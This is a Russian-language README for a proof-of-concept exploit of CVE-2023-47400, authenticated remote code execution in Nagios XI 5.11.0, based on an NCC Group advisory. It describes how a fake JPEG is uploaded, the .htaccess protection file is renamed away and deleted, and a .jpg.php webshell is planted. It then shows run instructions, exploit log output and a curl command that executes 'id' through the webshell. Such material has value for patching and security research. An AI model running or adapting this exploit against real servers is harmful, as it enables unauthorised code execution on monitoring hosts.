
Доказательство концепции для CVE-2023-47400
Доказательство концепции для CVE-2023-47400
Аутентифицированное удаленное выполнение PHP-кода через произвольную запись файла в Nagios XI 5.11.0
[!Note] Этот PoC основан на техническом обзоре, опубликованном группой NCC https://research.nccgroup.com/2023/12/13/technical-advisory-multiple-vulnerabilities-in-nagios-xi/
Этот PoC следует следующему процессу:
placeholder.jpg (только магические байты JFIF в заголовке, без содержимого)rename в Custom Includes, чтобы переименовать изображение в .htaccess (это приводит к перезаписи существующего файла .htaccess)delete в Custom Includes, чтобы удалить файл .htaccess.jpg.php)Эксплуатация этой уязвимости приводит к удаленному выполнению кода на хосте Nagios XI, обходя фильтры загрузки файлов (через фильтры сигнатуры файла и расширения файла) и предотвращение выполнения PHP (через .htaccess).
[!Warning] Этот эксплойт удаляет файл
<NAGIOS_WEB_ROOT>/includes/components/custom-includes/images/.htaccess, присутствующий на хосте, чтобы разрешить выполнение PHP-кода!
# create a venv to dependency isolation
python3 -m venv .venv
source .venv/bin/activate
# run pip install before running the exploit
pip install -r requirements.txt
настройте PHP-полезную нагрузку, которая будет размещена в папке загрузки изображений
запустите скрипт эксплойта:
python exploit.py
# the exploit generates a webshell and upload it with uuid as filename
[...]
INFO:cve_2023_47400:Successfuly uploaded payload at
INFO:cve_2023_47400:Usage :https://10.10.11.248/nagiosxi/includes/components/custom-includes/images/6ac234ca-8921-4e7e-a833-bf1ba03d2a3c.jpg.php
INFO:cve_2023_47400:Exploit completed successfuly
$ curl -k 'https://10.10.11.248/nagiosxi/includes/components/custom-includes/images/6ac234ca-8921-4e7e-a833-bf1ba03d2a3c.jpg.php?cmd=id' --output -
JFIF
uid=33(www-data) gid=33(www-data) groups=33(www-data),121(Debian-snmp),1001(nagios),1002(nagcmd)